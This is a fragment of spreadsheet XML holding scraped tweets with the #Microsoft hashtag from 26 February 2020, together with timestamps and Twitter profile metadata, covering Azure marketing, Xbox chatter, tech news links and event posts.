    <t>Huge thanks to #Microsoft in #Huntington for hosting a gaming event for #youth in our #AlternativesforYouth &amp;amp; #ChancetoAdvance programs (&amp;amp; their C2A #mentors)! Everyone had a great time! To learn more about our Children &amp;amp; Youth programs, visit https://t.co/beNdFNpbfX. #longisland https://t.co/M0V49ZVu4n</t>
  </si>
  <si>
    <t>{'id': 2288587758, 'id_str': '2288587758', 'name': 'EAC Network', 'screen_name': 'EACNet', 'location': 'Hempstead, NY 11550', 'description': 'Nonprofit human service agency with over 100 programs that Empower, Assist &amp; Care for our neighbors in need throughout Long Island &amp; NYC.', 'url': 'http://t.co/u0cw4aVl0d', 'entities': {'url': {'urls': [{'url': 'http://t.co/u0cw4aVl0d', 'expanded_url': 'http://www.eac-network.org', 'display_url': 'eac-network.org', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 412, 'friends_count': 278, 'listed_count': 28, 'created_at': 'Sun Jan 12 19:36:32 +0000 2014', 'favourites_count': 420, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2923,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'http://pbs.twimg.com/profile_images/1214998947196002309/CjMjinBE_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1214998947196002309/CjMjinBE_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2288587758/1579023876', 'profile_link_color': 'E54027',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</si>
  <si>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Wed Feb 26 14:14:32 +0000 2020</t>
  </si>
  <si>
    <t>60% of the projects we see reviewed are delivered LATE. This post explores 6 major causes.  What others would you add? https://t.co/Haycdha4jg #Workday #Oracle #ServiceNow #ultimatesoftware #SAP #Salesforce #Microsoft #Infor https://t.co/feuCJt3kqV</t>
  </si>
  <si>
    <t>{'id': 1387547190, 'id_str': '1387547190', 'name': 'Raven Intel', 'screen_name': 'ravenintell', 'location': '', 'description': 'Amplifying the voice of the customer in Enterprise Software. Helping customers find a partner other customers trust.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 376, 'friends_count': 302, 'listed_count': 9, 'created_at': 'Sun Apr 28 18:14:06 +0000 2013', 'favourites_count': 704, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 373,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'http://pbs.twimg.com/profile_images/1027773893753200641/_yQO_hEn_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1027773893753200641/_yQO_hEn_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1387547190/1561556480',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</si>
  <si>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14:14:30 +0000 2020</t>
  </si>
  <si>
    <t>Just a little throwback over here, trust i still got it. 
-
#gaming #HALO #HaloInfinite #mlg #esports #microsoft https://t.co/ofjM2hoykh</t>
  </si>
  <si>
    <t>{'id': 1000205825380634624, 'id_str': '1000205825380634624', 'name': 'Just Lioncourt', 'screen_name': 'iamlioncourt', 'location': 'Florida, USA', 'description': '/ Gamer &amp; Streamer / Song Writer / Business: iamlioncourt@hotmail.com CURRENTLY LOOKING FOR TEAM', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 242, 'friends_count': 492, 'listed_count': 2, 'created_at': 'Sat May 26 02:43:46 +0000 2018', 'favourites_count': 2981, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1495,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'http://pbs.twimg.com/profile_images/1224911771867189249/Ohlg1Oxe_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1224911771867189249/Ohlg1Oxe_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1000205825380634624/1578891099',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</si>
  <si>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14:14:16 +0000 2020</t>
  </si>
  <si>
    <t>via #Citrix Blogs: "Tricerat delivers printing success for your Citrix environment: " https://t.co/x7yg3m5BWo
.
.
.
#blog #virtualization #cloudcomputing #cloud #security #microsoft #azure #citrix #citrixishow</t>
  </si>
  <si>
    <t>Wed Feb 26 14:12:57 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Wants to do Away with #Windows 10 Local #Accounts
#CyberSecurity #Cloud 
https://t.co/f8nmsJov2S</t>
  </si>
  <si>
    <t>{'id': 767301046901301248, 'id_str': '767301046901301248', 'name': 'CSDistrict', 'screen_name': 'CSDistrict', 'location': 'Cosenza, Calabria', 'description': 'Distretto Cyber Security - Poste Italiane -\nCybersecurity and Data Protection: research &amp; development, innovation, training and awareness.', 'url': 'https://t.co/jnukBtyZQp', 'entities': {'url': {'urls': [{'url': 'https://t.co/jnukBtyZQp', 'expanded_url': 'http://www.distrettocybersecurity.it', 'display_url': 'distrettocybersecurity.it', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 566, 'friends_count': 1044, 'listed_count': 30, 'created_at': 'Sun Aug 21 10:03:20 +0000 2016', 'favourites_count': 103, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3566,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'http://pbs.twimg.com/profile_images/806453905655787520/-LHHP9bW_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/806453905655787520/-LHHP9bW_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/767301046901301248/1489593778',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</si>
  <si>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14:10:49 +0000 2020</t>
  </si>
  <si>
    <t>Explore how Simarco manages rapid growth seamlessly with Azure: https://t.co/EmCbfvzIC1
#Azure #CaseStudy #Microsoft #MicrosoftAzure #Cloud #CloudComputing #Growth #BusinessGrowth</t>
  </si>
  <si>
    <t>Wed Feb 26 14:10:29 +0000 2020</t>
  </si>
  <si>
    <t>Chromium-Based Microsoft Edge From A Forensic Point Of View
via Forensic Focus | #DFIR #Microsoft
https://t.co/wGTmKpya99</t>
  </si>
  <si>
    <t>Wed Feb 26 14:10:11 +0000 2020</t>
  </si>
  <si>
    <t>#Azure #WebApps Deployments #Microsoft #MSCloud #AzOps #AzurePowerShell #AzureCLI #CloudShell #PowerShell
https://t.co/C98DBjkbbv</t>
  </si>
  <si>
    <t>Wed Feb 26 14:09:59 +0000 2020</t>
  </si>
  <si>
    <t>SharePoint 2010 is turning 10, yet many are still using this legacy platform. Not many use the same computer as 10 years ago, so why use the same software? Its time to upgrade - read our latest blog #sharepoint #sharepointendofsupport #microsoft #azure
https://t.co/nuyL36MWdA https://t.co/yV7BBe8bpi</t>
  </si>
  <si>
    <t>#Microsoft releases #Windows10 builds 17763.1075, 17134.1345 - here's what's new https://t.co/vbbi8XAAsX by @TheRichWoods</t>
  </si>
  <si>
    <t>Wed Feb 26 14:09:16 +0000 2020</t>
  </si>
  <si>
    <t>Former Microsoft engineer convicted of 18 felonies for digital currency fraud scam https://t.co/Mf4RILyks4 #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 14:09:04 +0000 2020</t>
  </si>
  <si>
    <t>blood on the streets in the stock market   #apple #tesla #Microsoft
https://t.co/YLXUmFhBCe https://t.co/gGcSB1ia1Q</t>
  </si>
  <si>
    <t>{'id': 17050001, 'id_str': '17050001', 'name': 'CÃ©dric Walter', 'screen_name': 'cedricwalter', 'location': 'ZÃ¼rich - Switzerland', 'description': 'founder &amp; CEO of https://t.co/PEwG2EgExh #blockchain #SoftwareEngineer #geek #deeplearning #ethereum #corda https://t.co/84lb5vAdpd  https://t.co/hlRieowbXo https://t.co/S952N3htyK https://t.co/r9ir2gMcEk', 'url': 'https://t.co/A9y93FTZUD', 'entities': {'url': {'urls': [{'url': 'https://t.co/A9y93FTZUD', 'expanded_url': 'http://www.waltercedric.com', 'display_url': 'waltercedric.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/PEwG2EgExh', 'expanded_url': 'http://disruptr.ch', 'display_url': 'disruptr.ch', 'indices': [17, 40]}, {'url': 'https://t.co/84lb5vAdpd', 'expanded_url': 'http://tokens-economy.com', 'display_url': 'tokens-economy.com', 'indices': [108, 131]}, {'url': 'https://t.co/hlRieowbXo', 'expanded_url': 'http://cordalo.ch', 'display_url': 'cordalo.ch', 'indices': [133, 156]}, {'url': 'https://t.co/S952N3htyK', 'expanded_url': 'http://galaxiis.com', 'display_url': 'galaxiis.com', 'indices': [157, 180]}, {'url': 'https://t.co/r9ir2gMcEk', 'expanded_url': 'http://waltercedric.com', 'display_url': 'waltercedric.com', 'indices': [181, 204]}]}}, 'protected': False, 'followers_count': 602, 'friends_count': 76, 'listed_count': 120, 'created_at': 'Wed Oct 29 19:56:55 +0000 2008', 'favourites_count': 201, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4251,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'http://pbs.twimg.com/profile_images/1191110401469141000/e_NEMHga_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1191110401469141000/e_NEMHga_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/17050001/1572865639',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</si>
  <si>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Wed Feb 26 14:08:55 +0000 2020</t>
  </si>
  <si>
    <t>Struggling to find a CRM that makes it easy to identify opportunities from pre-sales through post-selling? High-performance polymer maker #Victrex maps the opportunity with #Dynamics365. Learn more from Prophet Business Group. #Microsoft https://t.co/aDeYx5cjIU</t>
  </si>
  <si>
    <t>Wed Feb 26 14:08:04 +0000 2020</t>
  </si>
  <si>
    <t>With #Microsoft #Office365 #AdvancedThreatProtection, PHI Technologies Corp offers an email filtering service that delivers stronger protection against specific types of advanced threats. https://t.co/jQUtaceblw</t>
  </si>
  <si>
    <t>Wed Feb 26 14:07:43 +0000 2020</t>
  </si>
  <si>
    <t>With no extended support for SQL Server 2008 and 2008 R2, it's time to modernize. Contact Quick Response Systems, Inc to start your transformation journey with #SQLServer 2017, #Windows Server 2016 and #Microsoft #Azure. https://t.co/52ycVYZhpz</t>
  </si>
  <si>
    <t>Wed Feb 26 14:06:02 +0000 2020</t>
  </si>
  <si>
    <t>On #MicrosoftAzure, #Atos and #Microsoft will be targeting the deployment of #SAPHANA Very Large Instances (VLI) in #Azure bare-metal or virtualized environments. 
Read more in the press release: 
https://t.co/SWUh3ahU36
#BullSequana #Cloud #Atos4SAP #BullSequana4HANA https://t.co/WamNVYSlco</t>
  </si>
  <si>
    <t>{'id': 784055028248182785, 'id_str': '784055028248182785', 'name': 'Dave Holton', 'screen_name': 'HoltonTech', 'location': 'London, England', 'description': 'Atos Client Executive and Digital Partner @ #Atos #Digital #Digitaltwin #AI #IoT #Industry40 #leadership #QuantumComputing All views are my own', 'url': 'https://t.co/qEauvqrlE0', 'entities': {'url': {'urls': [{'url': 'https://t.co/qEauvqrlE0', 'expanded_url': 'http://atos.net', 'display_url': 'atos.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1156, 'friends_count': 255, 'listed_count': 36, 'created_at': 'Thu Oct 06 15:37:40 +0000 2016', 'favourites_count': 116, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3228,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'http://pbs.twimg.com/profile_images/977530378222219265/tNr0w8tA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/977530378222219265/tNr0w8tA_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/784055028248182785/1527674389',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</si>
  <si>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14:03:19 +0000 2020</t>
  </si>
  <si>
    <t>Put today's data explosion to work for your business with #Microsoft #PowerBI and #Azure. Place data at your entire organization's fingertips, enabling anyone to transform business data into actionable insights. Subscribe now. https://t.co/rtsCt7yNlH</t>
  </si>
  <si>
    <t>Wed Feb 26 14:03:00 +0000 2020</t>
  </si>
  <si>
    <t>When you do something right, your employees let you know. Here's what NQCranes heard from administrators, technicians, &amp;amp; managers when they migrated to a #Microsoft cloud-based #ERP system. Watch now. #Technology #IT #BusinessAutomation https://t.co/w3WIBm5wSF</t>
  </si>
  <si>
    <t>Wed Feb 26 14:02:49 +0000 2020</t>
  </si>
  <si>
    <t>Considering #PowerBI or another set of #analytics tools? Dig into this white paper to see how you can leverage its current and future capabilities.      Learn more: AGJ Systems and Networks #Microsoft. https://t.co/vfzMYUkzW8</t>
  </si>
  <si>
    <t>Wed Feb 26 14:02:48 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Dynamics GP customers have many benefits, but discover why many companies are switching to @Acumatica here! https://t.co/ZLrZTLDeJt</t>
  </si>
  <si>
    <t>Wed Feb 26 14:02:31 +0000 2020</t>
  </si>
  <si>
    <t>Did you know you #Microsoft @Azure is available in140 countries? Expand your global reach. #CloudForAll #AI https://t.co/MNk1ygGhs2</t>
  </si>
  <si>
    <t>Wed Feb 26 14:02:20 +0000 2020</t>
  </si>
  <si>
    <t>#Delhi | Microsoft CEO Satya Nadella met Electronics &amp;amp; Information Technology Minister Ravi Shankar Prasad today.
#Microsoft #SatyaNadella #RaviShankarPrasad https://t.co/WeSnp7Vpat</t>
  </si>
  <si>
    <t>{'id': 1113747196099399680, 'id_str': '1113747196099399680', 'name': 'First India', 'screen_name': 'thefirstindia', 'location': 'Jaipur, India', 'description': 'Welcome to the Official Twitter page of First India Newspaper. Follow us for the latest updates. #FirstIndia', 'url': 'https://t.co/vkIswW9aBZ', 'entities': {'url': {'urls': [{'url': 'https://t.co/vkIswW9aBZ', 'expanded_url': 'http://www.firstindia.co.in', 'display_url': 'firstindia.co.in', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3551, 'friends_count': 185, 'listed_count': 3, 'created_at': 'Thu Apr 04 10:16:38 +0000 2019', 'favourites_count': 95, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 27212,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'http://pbs.twimg.com/profile_images/1138096106313662464/-847jJ9X_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1138096106313662464/-847jJ9X_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1113747196099399680/1575367742',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</si>
  <si>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14:01:18 +0000 2020</t>
  </si>
  <si>
    <t>In case you missed the news last month, #Microsoft has released an important patch as part of last month's updates and enhanced their ATP software to ensure sustained security.
https://t.co/uSbFtzBpAp</t>
  </si>
  <si>
    <t>Wed Feb 26 14:00:04 +0000 2020</t>
  </si>
  <si>
    <t>Fileless attack detection for #Linux is now in preview. Signup for the preview now! #linuxonazure #microsoft #MSFTAdvocate https://t.co/K45cU8mMx3</t>
  </si>
  <si>
    <t>{'id': 162374283, 'id_str': '162374283', 'name': 'Luis Flores', 'screen_name': 'luisp_flores', 'location': 'Mexico City', 'description': 'Sr Technical Specialist (Intelligent Edge) at Microsoft', 'url': 'https://t.co/Oz6xmn9p73', 'entities': {'url': {'urls': [{'url': 'https://t.co/Oz6xmn9p73', 'expanded_url': 'http://www.linkedin.com/pub/luis-pablo-flores-castillo/39/18a/740/en', 'display_url': 'linkedin.com/pub/luis-pabloâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 172, 'friends_count': 109, 'listed_count': 28, 'created_at': 'Sat Jul 03 13:20:19 +0000 2010', 'favourites_count': 332, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5337, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'C6E2EE', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1194794389807214594/n0fBXfEC_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1194794389807214594/n0fBXfEC_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/162374283/1437428598', 'profile_link_color': '1F98C7',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</si>
  <si>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Feb 26 14:00:02 +0000 2020</t>
  </si>
  <si>
    <t>Azure Sphere: SO de #Microsoft orientado a #IoT
#Azure #AzureSphere https://t.co/zb9bqf3LFs</t>
  </si>
  <si>
    <t>{'id': 732715720182751232, 'id_str': '732715720182751232', 'name': 'Servicios tecnolÃ³gicos | SWTI', 'screen_name': 'ServWorldTI', 'location': 'Venezuela / LatinoamÃ©rica ', 'description': 'Especialistas en consultarÃ­a e implementaciÃ³n de #serviciostecnolÃ³gicos ,\n#SolucionesTI y #MarketingDigital en Venezuela\ncontacto@servicesworldti.com', 'url': 'https://t.co/B9dw7KjGvm', 'entities': {'url': {'urls': [{'url': 'https://t.co/B9dw7KjGvm', 'expanded_url': 'http://www.servicesworldti.com', 'display_url': 'servicesworldti.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 337, 'friends_count': 747, 'listed_count': 16, 'created_at': 'Tue May 17 23:33:35 +0000 2016', 'favourites_count': 244, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1384, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1187843329041534982/DLaUmDP5_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1187843329041534982/DLaUmDP5_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/732715720182751232/1572035415',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</si>
  <si>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14:00:01 +0000 2020</t>
  </si>
  <si>
    <t>A pleasure to share our insights today on the future direction of enterprise #AI &amp;amp; #machinelearning for #Microsoft UKs sales org as part of Learning Day. Loved the live &amp;amp; streamed format in the Azure Theatre on the TV campus too TY @DrMayaDillon! #howwelearn #microsoftlife https://t.co/8sO3knLA8Y</t>
  </si>
  <si>
    <t>Wed Feb 26 13:59:21 +0000 2020</t>
  </si>
  <si>
    <t>About to kick off the @OpsCompass  Know Your Score #cloud #governance and  #compliance event at the #Microsoft Technology Center (#mtc) in Boston this morning
 #cloudadoption  #azure  #office365 https://t.co/J8KNDmsWwp</t>
  </si>
  <si>
    <t>{'id': 340955124, 'id_str': '340955124', 'name': 'Charlie', 'screen_name': 'CharlieCuddy', 'location': 'Omaha, NE', 'description': 'Husband, Dad, Cloud Engineer @OpsCompass, Runner, Learner, Painter, Reader, Sports Fan, and Former High School Teacher and Coach #codecuddy', 'url': 'https://t.co/r08i2Gi57a', 'entities': {'url': {'urls': [{'url': 'https://t.co/r08i2Gi57a', 'expanded_url': 'https://codecuddy.github.io', 'display_url': 'codecuddy.github.io', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 541, 'friends_count': 387, 'listed_count': 69, 'created_at': 'Sat Jul 23 15:25:36 +0000 2011', 'favourites_count': 53457, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 13108,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'http://pbs.twimg.com/profile_images/1061824432400781312/Zjqr2HMh_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1061824432400781312/Zjqr2HMh_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/340955124/1515132887',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</si>
  <si>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13:57:07 +0000 2020</t>
  </si>
  <si>
    <t>If you want to download some paid app from #Microsoft then good luck. The company gave me a key for Office 2019 and there is no way I can download it to activate it. Gonna use Open Office,  I had enough.</t>
  </si>
  <si>
    <t>Wed Feb 26 13:56:02 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft offers a closer look at the next #Xbox https://t.co/uwrQO7lh6K #XBoxSeriesX #Tech #echNews #Gaming #Technology #TechnologyNews #ITRTG #SNRTG https://t.co/CqY1gfQY2H</t>
  </si>
  <si>
    <t>Wed Feb 26 13:55:22 +0000 2020</t>
  </si>
  <si>
    <t>New Delhi.
26th Feb2020.
A little chitchat!
A meeting close 2 my Heart!
Sitting next 2 @satyanadella!
#CEO #Microsoft representing #KamlaNehruPublicSchool ! Thanks Dear Students. 
Thanks Dear Educators.
Fabulous Team @KnpsIndia BigThanks 2 @vjauhari1 #MicrosoftIndia @sparvell https://t.co/B2BEjCTMEt</t>
  </si>
  <si>
    <t>Wed Feb 26 13:53:46 +0000 2020</t>
  </si>
  <si>
    <t>Learn AWS Solution Architect
Now ON CAMPUS training in your own Chicago!!
Know More;
https://t.co/WwIVc9rOnn
#aws, #cloudcomputing, #devops, #azure, #it, #amazon, #amazonwebservices,
#database, #innovation, #bigdata, #cloud, #datascience, #developer, #RainDrops,
#microsoft, https://t.co/qvNWGOmVqN</t>
  </si>
  <si>
    <t>Wed Feb 26 13:51:54 +0000 2020</t>
  </si>
  <si>
    <t>Its now possible to preview yaml pipelines withoit running or comitting them in #AzureDevOps #Microsoft. This is really helpful for pipeline tweaking! 
https://t.co/PHReeCSlKe</t>
  </si>
  <si>
    <t>{'id': 2689991412, 'id_str': '2689991412', 'name': 'Jev Suchoi', 'screen_name': 'DevJevNL', 'location': 'The Netherlands', 'description': 'Knowledge is power, sharing knowledge is powerful. I prefer being Powerful.\nConsultant @daytime, automation master @nighttime', 'url': 'https://t.co/ymPaGmzgZ5', 'entities': {'url': {'urls': [{'url': 'https://t.co/ymPaGmzgZ5', 'expanded_url': 'http://www.devjev.nl', 'display_url': 'devjev.nl', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 60, 'friends_count': 67, 'listed_count': 21, 'created_at': 'Tue Jul 29 12:31:24 +0000 2014', 'favourites_count': 500, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 636,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'http://pbs.twimg.com/profile_images/1173144441588240385/rSkBOPe8_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1173144441588240385/rSkBOPe8_normal.jpg', 'profile_link_color': '02AFAD',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</si>
  <si>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13:50:58 +0000 2020</t>
  </si>
  <si>
    <t>For #SMBs, moving to the #cloud is proven to help achieve greater profit margins and ROI. Check out this informative infographic to see why it's a game changer.      #Microsoft #Technology #BusinessAutomation #accounting #MSDyn365 https://t.co/3DIeOSl315</t>
  </si>
  <si>
    <t>Wed Feb 26 13:48:41 +0000 2020</t>
  </si>
  <si>
    <t>"Don't tell me what I've become I already know, I have the #qualities of #shallow #self #loathing that #run #deep but that's only when I'm #asleep. When I'm #awake things are different I'm so #passionately #cheap and I like it".
#created #microsoft #paint https://t.co/AsDm6Hxk78</t>
  </si>
  <si>
    <t>Wed Feb 26 13:47:48 +0000 2020</t>
  </si>
  <si>
    <t>Google Chrome's fear of #Microsoft Edge is revealing its bad side https://t.co/9BfYWOCylZ</t>
  </si>
  <si>
    <t>Wed Feb 26 13:46:32 +0000 2020</t>
  </si>
  <si>
    <t>How to Install #Microsoft #Teams #Linux on #Ubuntu and #CentOS. https://t.co/e6FvtQB22t via @howtoforgecom https://t.co/UNkTyZRoi6</t>
  </si>
  <si>
    <t>{'id': 2323880252, 'id_str': '2323880252', 'name': 'Howtoforge', 'screen_name': 'howtoforgecom', 'location': '', 'description': 'HowtoForge provides user-friendly #Linux tutorials about almost every topic.', 'url': 'https://t.co/y5JvWyc2tF', 'entities': {'url': {'urls': [{'url': 'https://t.co/y5JvWyc2tF', 'expanded_url': 'https://www.howtoforge.com', 'display_url': 'howtoforge.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 28021, 'friends_count': 49, 'listed_count': 180, 'created_at': 'Sun Feb 02 14:44:38 +0000 2014', 'favourites_count': 3, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2221,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'http://pbs.twimg.com/profile_images/583539866295730177/5ckb1Xve_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/583539866295730177/5ckb1Xve_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2323880252/1413535617',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</si>
  <si>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13:45:06 +0000 2020</t>
  </si>
  <si>
    <t>Interesting #article from @theregister: Deutsche Bank has reportedly invited bids from #Microsoft, #Google, and #Amazon to pitch for #cloud services and other project work 
#ClickLink to know more: https://t.co/LG5rsEeipD  
#HTILabs #News #Investment #Cloud #Data #Analysis https://t.co/prktAb7gua</t>
  </si>
  <si>
    <t>Wed Feb 26 13:44:38 +0000 2020</t>
  </si>
  <si>
    <t>BIG TECHNOLOGY BULL RUN$ 2 TRILLION 
Technology is the future. Adopt it or become irrelevant. Economist magazine dated Feb 22-28/2020. 
#IQI #Economist #Apple #Alphabet #Amazon #ShanSaeed #proptech  #Technology #Microsoft #Stocks #Valuation #realestate #Bullrun https://t.co/XkIEUbsrmZ</t>
  </si>
  <si>
    <t>{'id': 19059091, 'id_str': '19059091', 'name': 'Shan Saeed', 'screen_name': 'ShanSaeedSays', 'location': 'Kuala Lumpur/Chicago', 'description': 'Graduated from Uni. of Chicago, Booth School of Business with an MBA. Trained in banking strategies at Harvard Business School. Financial markets commentator.', 'url': 'https://t.co/KCsgH402KE', 'entities': {'url': {'urls': [{'url': 'https://t.co/KCsgH402KE', 'expanded_url': 'http://www.economistshan.blogspot.com/', 'display_url': 'economistshan.blogspot.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1088, 'friends_count': 1921, 'listed_count': 20, 'created_at': 'Fri Jan 16 08:05:41 +0000 2009', 'favourites_count': 1057, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3047,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'http://pbs.twimg.com/profile_images/1035543067351113729/og-zVOUV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1035543067351113729/og-zVOUV_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/19059091/1570088962',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</si>
  <si>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13:44:01 +0000 2020</t>
  </si>
  <si>
    <t>With the release of Halo Infinite later this year should I re purchase an Xbox One X or get the new X-series console when it is released?  #Xbox #XboxOne #XboxOneX #Microsoft #XboxSeriesX #XboxLive #HaloMasterChief #Halo</t>
  </si>
  <si>
    <t>Wed Feb 26 13:42:02 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> Huge discount of 25% on #Microsoft Bluetooth Mouse.  Snap this deal: https://t.co/k8qwmYM5ob
#iGeeksDeals https://t.co/gcMFpAcSfm</t>
  </si>
  <si>
    <t>{'id': 1215882892917624832, 'id_str': '1215882892917624832', 'name': 'iGeeksDeals', 'screen_name': 'iGeeksDeals', 'location': '', 'description': 'The Number #1. Deals and Discount Platform for Consumers', 'url': 'https://t.co/GXyap94rl2', 'entities': {'url': {'urls': [{'url': 'https://t.co/GXyap94rl2', 'expanded_url': 'http://www.igeeksdeals.com', 'display_url': 'igeeksdeals.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3, 'friends_count': 3, 'listed_count': 0, 'created_at': 'Sat Jan 11 06:28:57 +0000 2020', 'favourites_count': 0,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'http://pbs.twimg.com/profile_images/1229370758977089536/vau7DjoG_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1229370758977089536/vau7DjoG_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1215882892917624832/1581940642',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</si>
  <si>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13:38:42 +0000 2020</t>
  </si>
  <si>
    <t>"For videogames forums, announcing #12TF was the best day of their lifes. For us, it was monday" //
#Microsoft #Xbox #XboxseriesX #12teraflops #nextgen</t>
  </si>
  <si>
    <t>{'id': 1218900426281582592, 'id_str': '1218900426281582592', 'name': 'Sh4d0wrun', 'screen_name': 'sh4d0wrun', 'location': '', 'description': 'â€œNo IC could stop me. My Cyberdeck allowed me to do as I wanted in the Matrix. I could open any door or grab any data you needed. I was the best!â€', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 6, 'friends_count': 45, 'listed_count': 0, 'created_at': 'Sun Jan 19 14:18:50 +0000 2020', 'favourites_count': 63, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 31, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1218900713494937602/rN5FRaDw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1218900713494937602/rN5FRaDw_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1218900426281582592/1579444025',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</si>
  <si>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13:38:27 +0000 2020</t>
  </si>
  <si>
    <t>New Azure blueprint for CIS Benchmark
https://t.co/O9LhrwEUyf
#Microsoft #Azure #Governance #AzureGovernance #AzureBluePrint</t>
  </si>
  <si>
    <t>Wed Feb 26 13:36:50 +0000 2020</t>
  </si>
  <si>
    <t>Very important #decisions and #deeds already taken in 2020:
- replaced #YouTube, #ResearchGate, #OSF, #ZENODO by #LBRY @LBRYio
- replaced #GoogleChrome by #BRAVE @brave
- replaced #WhatsApp (#Facebook) by #Signal @signalapp
- left #LinkedIn (#Microsoft)
- got @Mailfence</t>
  </si>
  <si>
